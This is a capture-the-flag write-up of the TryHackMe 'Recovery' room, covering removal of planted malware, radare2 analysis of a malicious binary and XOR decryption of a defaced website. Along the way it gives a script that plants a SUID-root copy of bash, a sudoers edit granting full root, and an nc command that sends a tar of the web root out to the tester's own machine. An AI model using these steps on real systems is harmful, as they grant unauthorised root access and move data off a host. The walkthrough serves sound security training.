TryHackMe: Medium Difficulty – Recovery Room Walkthrough

Written by darknite -
on February 7, 2021

In this post, i would like to share a walkthrough of the Recovery Room.

This room has been considered difficulty rated as a MEDIUM machine

Malware Analysis is not really my forte and I learn a lot from this room. As a result, I have tried the Recovery Room multiple times which resulted in a different IP on my screenshot later and I’m sorry for that.

Let’s Start!

We need to deploy the machine for us to play with the machine

Testing

Start playing with the Recovery room

Once the machine is fully up within 3 minutes, we can start the information gathering on the machine by executing the command nmap -sC -sV <IP Address> -PN

There are multiple ports that have been open but the crucial port that caught my attention

  • 22: OpenSSH 7.2p2
  • 80: Apache httpd 2.4.43

However, we are provided with some useful information such as SSH credentials that we will need to use along the way. Aside from that, we also can track the progress on port 1337

Let’s see the website

Oh no! The website has been encrypted and nothing that we can do for now.

SSH Access on the Recovery machine

Let’s SSH into the machine

We cannot properly access the machine via ssh because the malware has affected the machine

let run the ssh service by execute ssh alex@<IP Address> “/bin/bash”

We can access the machine via /bin/bash

From the listing, I notice that .bashrc file was stored there.

Let’s rename the file by executing mv .bashrc .bashrc_backup

Let’s try to login via SSH service again

Oh wow! We successfully login without any error message appearing like before.

However, you will be disconnected from the machine, and we need to investigate later.

Play with the fixutil binary on Recovery room

Let’s grab the file by using scp alex@<IP Address>:fixutil .

I need to disable the file so that they will not affect our own machine.

We need to analyze the fixutil file where we might discover something important to us in getting everything back to normal.

While scrolling down the file, we found the malicious code that we need to delete from .bashrc (the file that we edited to .bashrc_backup file earlier)

Analyze the file by forensic method

There’s a line that executes the bash scripting at /opt/brilliant_script.sh location. Let’s grab the file for us to analyze furthermore.

We need to disable the file so that they will not affect our own machine.

I can see that some scripts have been saved in the brilliant_script.sh file

We need to clear the content inside the file and replace it with the content below

#!/bin/bash
cp /bin/bash /bin/shell
chmod +x /bin/shell
chmod u+s /bin/shell

We must save the content so that it will take effect later

I need to analyze the malware file using radare2.

* Reminder: There are a lot of malware analysis tools such as IDA PRO, Ghidra, and so on. I plan to use radare instead here

Playing with radare tool

We need to run the command r2 fixutil and follow the next command as below:

> aaaa
> s main
> pdg

It will look like the above.

While we analyze the malware file, I notice there was a process going on such as the malware file have been copy-paste with the old and legit file to /tmp/logging.so and renaming it into oldliblogging.so

After successfully the above process, the malware will automatically include a malicious code into the current file (liblogging.so)

What we need to do now is that revert the oldliblogging.so to the current liblogging.so

I also notice there’s an SSH session that required authorized keys at /root/.ssh directory which the key needs to be deleted

Next, we must access the password file by executing nano /etc/passwd. When we are inside the file, we need to remove everything on “security user” which look like the screenshot above.

Trying to fix the issues

We also need to add alex privileges to ALL in the /etc/sudoers so that we can access as root.

For us to access the machine as root, we need to run the command sudo shell and then shell -p

Let’s find the malware’s key so that we can fix the website back to normal.

For us to achieve that purpose, we need to access /opt/.fiixutil and there’s a backup.txt file saved in the directory

We have the key to decrypt the file

The files that are required to decrypt can be found at /usr/local/apache2/htdocs

We need to transfer all the files over here into our own machine so that it will be easier to decrypt the file. Firstly, we need to tar -cvf backup.tar * where it will zip everything into a tar file

Once that has been completed, we can use the method below:

  • On our own machine: We need to run nc -lvp any port > backup.tar
  • On Target’s machine: We need to run nc IP Address port < backup.tar

It should look like the screenshot above

Let’s extract the tar file so that we can use those files to decrypt

For this purpose, i will use the XOR Recipe and use the key that we found just now. Aside from that, we use UTF8 as the output result where the encrypted file will be uploaded on the Input section

We need to clean every content in the file and replace it with the decrypted content in the clean file

You will need to repeat the same process with the remaining 2 files which are required to be decrypted too.

When you have finished replacing the actual content into the file, you will see the website interface just shown as above (You need to refresh back the affected page before)

On <IP Address>:1337, you will need to click the refresh button and all the flag will appear for you to key in the room.

Extra Work!

You must delete all the affected files in the machine to ensure the machine is clean from any malicious code

-The End-

Happy Learning Guys!

Categories:

TryHackMe

Tags:

ChallengesTryHackMe

No responses yet

Leave a Reply

Your email address will not be published. Required fields are marked *